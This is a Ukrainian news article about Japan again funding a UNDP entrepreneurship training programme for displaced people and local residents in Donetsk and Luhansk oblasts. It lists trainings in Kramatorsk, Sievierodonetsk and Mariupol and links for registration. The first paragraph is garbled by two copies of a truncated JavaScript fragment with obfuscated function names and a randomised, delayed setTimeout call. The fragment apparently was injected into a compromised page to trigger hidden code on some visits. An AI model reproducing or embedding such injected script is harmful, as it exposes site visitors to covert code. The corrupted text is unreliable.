Уряд Японії вдруге підтримав навчальну програму ПРООН

24.06.2016

За сприяння Уряду Японії у липні-серпні цього року буде продовжено реалізацію навчальної програми ПРООН «Розвиток навичок підприємницької діяльності серед ВПО та місцевого населення Донецької та Луганської областей».andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

 

Загалом планується провести 36 тренінгів. Вони проходитимуть у містах Краматорськ, Сєверодонецьк та Маріуполь. До участі у тренінгах будуть запрошені щонайменше 900 осіб, які вирішили започаткувати чи поновити власну справу, але з якихось причин не потрапили на навчання у попередніх циклах.

 

Варто зазначити, що Уряд Японії вже вдруге виділяє кошти на втілення цього проекту у життя. Саме за його фінансової підтримки програма ПРООН стартувала восени минулого року. Також до її реалізації долучилися Міністерство закордонних справ Польщі, Уряди Чехії та Великобританії.

 

Навчальна програма ПРООН є безкоштовною. Більше того, підготувавши перспективний бізнес-план (скласти який допоможуть досвідчені тренери) та подавши його на конкурс, можна отримати грант на його реалізацію.

 

Детальніше про умови участі в програмі ПРООН можна дізнатись, завітавши на сайт проекту за адресою: www.vpo-study.org.

 

Графік навчання – за посиланням: http://vpo-study.org/dovidkova-informatsiya/hrafiky-provedennya-treninhiv

 

Зареєструватись на участь у тренінгу можна тут: http://vpo-study.org/staty-uchasnykom/rejestratsiya-uchasnykiv

Географія навчальної програми

За підтримки:

Приєднуйся до нас на: